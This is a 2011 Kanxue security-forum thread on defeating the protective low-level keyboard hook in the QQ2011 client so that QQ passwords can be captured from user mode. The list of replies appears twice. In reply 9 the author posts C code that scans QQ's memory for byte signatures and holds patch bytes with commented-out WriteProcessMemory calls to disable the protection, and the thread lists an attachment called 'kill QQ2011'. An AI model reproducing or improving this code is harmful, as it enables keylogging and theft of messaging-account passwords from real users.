[原创]QQ2011低级键盘钩子分析----ring3截获QQ密码-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[原创]QQ2011低级键盘钩子分析----ring3截获QQ密码

发表于: 2011-5-15 09:10 149911

[原创]QQ2011低级键盘钩子分析----ring3截获QQ密码

hackerlzc

2011-5-15 09:10

149911

登录后可查看完整内容

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！

上传的附件：

kill QQ2011.rar （57.28kb，1051次下载）

收藏・109

免费・7

支持

最新回复 (124) 1 2 3 4 5 ▶
复古雪币： 104 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 19 粉丝 0 关注私信	复古 2 楼终于升级到初级会员革命尚未成功同志还需努力 2011-5-15 09:40 0
nevinslee 雪币： 85 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 63 粉丝 0 关注私信	nevinslee 3 楼菜鸟看过后，仍不明白其作用。 2011-5-15 10:28 0
林smile 雪币： 31 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 15 回帖 68 粉丝 0 关注私信	林smile 4 楼我简直是看不懂啊 2011-5-15 11:04 0
hackerlzc 雪币： 1689 活跃值： (379) 能力值： ( LV15，RANK：440 ) 在线值：发帖 33 回帖 613 粉丝 16 关注私信	hackerlzc 10 5 楼不好意思，写的有些仓促，主要谈论了下思路。细节看代码啦。有问题上来讨论。呵呵 2011-5-15 11:47 0
mumaren 雪币： 71 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 48 回帖 659 粉丝 0 关注私信	mumaren 6 楼思路没看懂 3q 2011-5-15 12:01 0
shuax 雪币： 1847 活跃值： (1816) 能力值： ( LV12，RANK：230 ) 在线值：发帖 14 回帖 251 粉丝 9 关注私信	shuax 2 7 楼额，你每次搜索就移动一个位置啊，那当然慢了，可以试着一次读取4k内存，然后再搜索，应该会快很多 2011-5-15 13:14 0
hackerlzc 雪币： 1689 活跃值： (379) 能力值： ( LV15，RANK：440 ) 在线值：发帖 33 回帖 613 粉丝 16 关注私信	hackerlzc 10 8 楼我是先通过页面属性先确定搜索区域的。然后再匹配特征码。真不知道CE是怎么做的，具体楼上有什么思路可以说的详细些不?你的意思是在程序里开辟4k的缓冲区，然后一次读4K数据进这个缓冲区吗？ 2011-5-15 15:41 0
hackerlzc 雪币： 1689 活跃值： (379) 能力值： ( LV15，RANK：440 ) 在线值：发帖 33 回帖 613 粉丝 16 关注私信	hackerlzc 10 9 楼哈哈，改进成功了。就是一次读一页的内存，然后再匹配。用不到一秒的时间就可以找到两处特征码了。谢谢7楼的帮助。 BYTE CharacterCode[ 9 ] = {0x8B,0x4D,0xFC,0x89,0x41,0x14,0x8B,0x4D,0xfc};//locate the set hook call BYTE CharacterCode2[8 ] = {0xB9,0x7,0,0,0,0x33,0xC0,0xFC}; BYTE code[ 2 ] = { 0xeb,0x47 }; BYTE code2[ 18 ] = {0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x33,0xc0}; BYTE buffer[ 4096 ]; void Patch( HANDLE hProcess ) { BYTE mem[ 9 ]={0},p,p1,base,addr1,addr2,q_hook_proc; DWORD retBytes; int i,flag; MEMORY_BASIC_INFORMATION mem_info; flag = 0; for( base = NULL;(DWORD)base <=0x1fff000;base+=0x1000 ) { VirtualQueryEx( hProcess,base,&mem_info,sizeof( mem_info ) ); while( mem_info.State != MEM_COMMIT \|\| //mem_info.State != MEM_RESERVE \|\| mem_info.Type == MEM_IMAGE \|\| mem_info.Type == MEM_MAPPED \|\| (mem_info.Protect != PAGE_EXECUTE_READWRITE && mem_info.Protect != PAGE_READWRITE) ) { base = /(DWORD)mem_info.BaseAddress/base+(DWORD)mem_info.RegionSize; if( base > 0x1ffffff )return; VirtualQueryEx( hProcess,base,&mem_info,sizeof( mem_info ) ); } //printf("\n%x %x",base,mem_info.RegionSize ); for( p = base;(DWORD)p < (DWORD)base + mem_info.RegionSize;p+=4096) { if( !ReadProcessMemory( hProcess,p,buffer,4096,&retBytes )) continue; for( i = 0;i < 4096-8;i++) { if( memcmp( &buffer[i],CharacterCode2,8 ) == 0 ) { q_hook_proc = p + i - 0x12; printf("\nhookproc:%x\n",q_hook_proc ); } } for( i = 0;i < 4096 - 9;i++) { if( memcmp( &buffer[i],CharacterCode,9 ) == 0 ) { printf("%x ",p+i ); if( flag == 0 ){ addr1 = p+i; flag++; continue; } if( flag == 1 ){ addr2 = p+i; flag++; break; } } } } if( flag == 2 )break; base = p-0x1000; } //这里为了验证特征码，暂时不修改内存。 /* WriteProcessMemory( hProcess,(DWORD)addr2 + 13,code,2,NULL ); WriteProcessMemory( hProcess,(DWORD)addr2 - 18,code2,18,NULL ); WriteProcessMemory( hProcess,(DWORD)addr1 + 13,code,2,NULL ); WriteProcessMemory( hProcess,(DWORD)addr1 - 18,code2,18,NULL ); */ } 至于思路的问题，大家好好看下代码，再结合上边的简略描述，我想理解起来应该不是太困难了。把代码中的patch函数改进之后，效率就更高了…… 2011-5-15 16:55 0
ddao 雪币： 127 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 118 粉丝 0 关注私信	ddao 10 楼腾讯又要进行重大更新了！ 2011-5-16 12:43 0
痞子辉雪币： 308 活跃值： (25) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 231 粉丝 0 关注私信	痞子辉 1 11 楼楼主写的不错，就是排版有点差。。。顶 2011-5-16 14:49 0
cooseasy 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 130 粉丝 0 关注私信	cooseasy 12 楼楼主很厉害，膜拜～ 2011-5-16 16:11 0
ncsi 雪币： 116 活跃值： (321) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 58 粉丝 0 关注私信	ncsi 13 楼学习了，好好去研究下 2011-5-16 17:00 0
希哥雪币： 612 活跃值： (20) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 114 粉丝 0 关注私信	希哥 14 楼这个。。看了还是不知道干嘛的太菜了。。 2011-5-16 17:04 0
9494 雪币： 172 活跃值： (212) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 245 粉丝 0 关注私信	9494 15 楼如果是自己研究出来的就有点价值... 2011-5-16 19:17 0
xmgood 雪币： 209 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 26 粉丝 0 关注私信	xmgood 16 楼腾讯又要进行重大更新了！ 2011-5-16 19:31 0
sunson 雪币： 271 活跃值： (196) 能力值： ( LV2，RANK：10 ) 在线值：发帖 25 回帖 206 粉丝 0 关注私信	sunson 17 楼下载收藏。。。 2011-5-17 00:01 0
gwljt 雪币： 58 活跃值： (274) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 45 粉丝 0 关注私信	gwljt 18 楼刚刚升级成正式会员第一帖来支持你 2011-5-17 10:46 0
孤山散人雪币： 211 活跃值： (118) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 132 粉丝 1 关注私信	孤山散人 19 楼先学习一下。。 2011-5-17 11:22 0
hahadazu 雪币： 321 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 50 粉丝 0 关注私信	hahadazu 20 楼楼主强啊，顶起~~ 2011-5-17 13:53 0
yaneng 雪币： 76 活跃值： (55) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 135 粉丝 0 关注私信	yaneng 21 楼什么时候我也能分析别人的软件？？？-----好好学习天天向上 2011-5-17 13:58 0
信息组雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	信息组 22 楼牛人处处有啊 2011-5-17 17:14 0
高粱雪币： 48 活跃值： (30) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 97 粉丝 0 关注私信	高粱 23 楼楼主很厉害，膜拜～ 2011-5-17 20:03 0
hackerlzc 雪币： 1689 活跃值： (379) 能力值： ( LV15，RANK：440 ) 在线值：发帖 33 回帖 613 粉丝 16 关注私信	hackerlzc 10 24 楼刚看看腾迅的官网，好象还没有最新的更新出来。太慢了，期待！ 2011-5-18 22:52 0
tihty 雪币： 27 活跃值： (127) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 1095 粉丝 3 关注私信	tihty 2 25 楼还一直有人在盯着QQ啊 2011-5-18 23:00 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

hackerlzc

发帖

613

回帖

440

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (124) 1 2 3 4 5 ▶
复古雪币： 104 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 19 粉丝 0 关注私信	复古 2 楼终于升级到初级会员革命尚未成功同志还需努力 2011-5-15 09:40 0
nevinslee 雪币： 85 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 63 粉丝 0 关注私信	nevinslee 3 楼菜鸟看过后，仍不明白其作用。 2011-5-15 10:28 0
林smile 雪币： 31 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 15 回帖 68 粉丝 0 关注私信	林smile 4 楼我简直是看不懂啊 2011-5-15 11:04 0
hackerlzc 雪币： 1689 活跃值： (379) 能力值： ( LV15，RANK：440 ) 在线值：发帖 33 回帖 613 粉丝 16 关注私信	hackerlzc 10 5 楼不好意思，写的有些仓促，主要谈论了下思路。细节看代码啦。有问题上来讨论。呵呵 2011-5-15 11:47 0
mumaren 雪币： 71 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 48 回帖 659 粉丝 0 关注私信	mumaren 6 楼思路没看懂 3q 2011-5-15 12:01 0
shuax 雪币： 1847 活跃值： (1816) 能力值： ( LV12，RANK：230 ) 在线值：发帖 14 回帖 251 粉丝 9 关注私信	shuax 2 7 楼额，你每次搜索就移动一个位置啊，那当然慢了，可以试着一次读取4k内存，然后再搜索，应该会快很多 2011-5-15 13:14 0
hackerlzc 雪币： 1689 活跃值： (379) 能力值： ( LV15，RANK：440 ) 在线值：发帖 33 回帖 613 粉丝 16 关注私信	hackerlzc 10 8 楼我是先通过页面属性先确定搜索区域的。然后再匹配特征码。真不知道CE是怎么做的，具体楼上有什么思路可以说的详细些不?你的意思是在程序里开辟4k的缓冲区，然后一次读4K数据进这个缓冲区吗？ 2011-5-15 15:41 0
hackerlzc 雪币： 1689 活跃值： (379) 能力值： ( LV15，RANK：440 ) 在线值：发帖 33 回帖 613 粉丝 16 关注私信	hackerlzc 10 9 楼哈哈，改进成功了。就是一次读一页的内存，然后再匹配。用不到一秒的时间就可以找到两处特征码了。谢谢7楼的帮助。 BYTE CharacterCode[ 9 ] = {0x8B,0x4D,0xFC,0x89,0x41,0x14,0x8B,0x4D,0xfc};//locate the set hook call BYTE CharacterCode2[8 ] = {0xB9,0x7,0,0,0,0x33,0xC0,0xFC}; BYTE code[ 2 ] = { 0xeb,0x47 }; BYTE code2[ 18 ] = {0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x33,0xc0}; BYTE buffer[ 4096 ]; void Patch( HANDLE hProcess ) { BYTE mem[ 9 ]={0},p,p1,base,addr1,addr2,q_hook_proc; DWORD retBytes; int i,flag; MEMORY_BASIC_INFORMATION mem_info; flag = 0; for( base = NULL;(DWORD)base <=0x1fff000;base+=0x1000 ) { VirtualQueryEx( hProcess,base,&mem_info,sizeof( mem_info ) ); while( mem_info.State != MEM_COMMIT \|\| //mem_info.State != MEM_RESERVE \|\| mem_info.Type == MEM_IMAGE \|\| mem_info.Type == MEM_MAPPED \|\| (mem_info.Protect != PAGE_EXECUTE_READWRITE && mem_info.Protect != PAGE_READWRITE) ) { base = /(DWORD)mem_info.BaseAddress/base+(DWORD)mem_info.RegionSize; if( base > 0x1ffffff )return; VirtualQueryEx( hProcess,base,&mem_info,sizeof( mem_info ) ); } //printf("\n%x %x",base,mem_info.RegionSize ); for( p = base;(DWORD)p < (DWORD)base + mem_info.RegionSize;p+=4096) { if( !ReadProcessMemory( hProcess,p,buffer,4096,&retBytes )) continue; for( i = 0;i < 4096-8;i++) { if( memcmp( &buffer[i],CharacterCode2,8 ) == 0 ) { q_hook_proc = p + i - 0x12; printf("\nhookproc:%x\n",q_hook_proc ); } } for( i = 0;i < 4096 - 9;i++) { if( memcmp( &buffer[i],CharacterCode,9 ) == 0 ) { printf("%x ",p+i ); if( flag == 0 ){ addr1 = p+i; flag++; continue; } if( flag == 1 ){ addr2 = p+i; flag++; break; } } } } if( flag == 2 )break; base = p-0x1000; } //这里为了验证特征码，暂时不修改内存。 /* WriteProcessMemory( hProcess,(DWORD)addr2 + 13,code,2,NULL ); WriteProcessMemory( hProcess,(DWORD)addr2 - 18,code2,18,NULL ); WriteProcessMemory( hProcess,(DWORD)addr1 + 13,code,2,NULL ); WriteProcessMemory( hProcess,(DWORD)addr1 - 18,code2,18,NULL ); */ } 至于思路的问题，大家好好看下代码，再结合上边的简略描述，我想理解起来应该不是太困难了。把代码中的patch函数改进之后，效率就更高了…… 2011-5-15 16:55 0
ddao 雪币： 127 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 118 粉丝 0 关注私信	ddao 10 楼腾讯又要进行重大更新了！ 2011-5-16 12:43 0
痞子辉雪币： 308 活跃值： (25) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 231 粉丝 0 关注私信	痞子辉 1 11 楼楼主写的不错，就是排版有点差。。。顶 2011-5-16 14:49 0
cooseasy 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 130 粉丝 0 关注私信	cooseasy 12 楼楼主很厉害，膜拜～ 2011-5-16 16:11 0
ncsi 雪币： 116 活跃值： (321) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 58 粉丝 0 关注私信	ncsi 13 楼学习了，好好去研究下 2011-5-16 17:00 0
希哥雪币： 612 活跃值： (20) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 114 粉丝 0 关注私信	希哥 14 楼这个。。看了还是不知道干嘛的太菜了。。 2011-5-16 17:04 0
9494 雪币： 172 活跃值： (212) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 245 粉丝 0 关注私信	9494 15 楼如果是自己研究出来的就有点价值... 2011-5-16 19:17 0
xmgood 雪币： 209 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 26 粉丝 0 关注私信	xmgood 16 楼腾讯又要进行重大更新了！ 2011-5-16 19:31 0
sunson 雪币： 271 活跃值： (196) 能力值： ( LV2，RANK：10 ) 在线值：发帖 25 回帖 206 粉丝 0 关注私信	sunson 17 楼下载收藏。。。 2011-5-17 00:01 0
gwljt 雪币： 58 活跃值： (274) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 45 粉丝 0 关注私信	gwljt 18 楼刚刚升级成正式会员第一帖来支持你 2011-5-17 10:46 0
孤山散人雪币： 211 活跃值： (118) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 132 粉丝 1 关注私信	孤山散人 19 楼先学习一下。。 2011-5-17 11:22 0
hahadazu 雪币： 321 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 50 粉丝 0 关注私信	hahadazu 20 楼楼主强啊，顶起~~ 2011-5-17 13:53 0
yaneng 雪币： 76 活跃值： (55) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 135 粉丝 0 关注私信	yaneng 21 楼什么时候我也能分析别人的软件？？？-----好好学习天天向上 2011-5-17 13:58 0
信息组雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	信息组 22 楼牛人处处有啊 2011-5-17 17:14 0
高粱雪币： 48 活跃值： (30) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 97 粉丝 0 关注私信	高粱 23 楼楼主很厉害，膜拜～ 2011-5-17 20:03 0
hackerlzc 雪币： 1689 活跃值： (379) 能力值： ( LV15，RANK：440 ) 在线值：发帖 33 回帖 613 粉丝 16 关注私信	hackerlzc 10 24 楼刚看看腾迅的官网，好象还没有最新的更新出来。太慢了，期待！ 2011-5-18 22:52 0
tihty 雪币： 27 活跃值： (127) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 1095 粉丝 3 关注私信	tihty 2 25 楼还一直有人在盯着QQ啊 2011-5-18 23:00 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复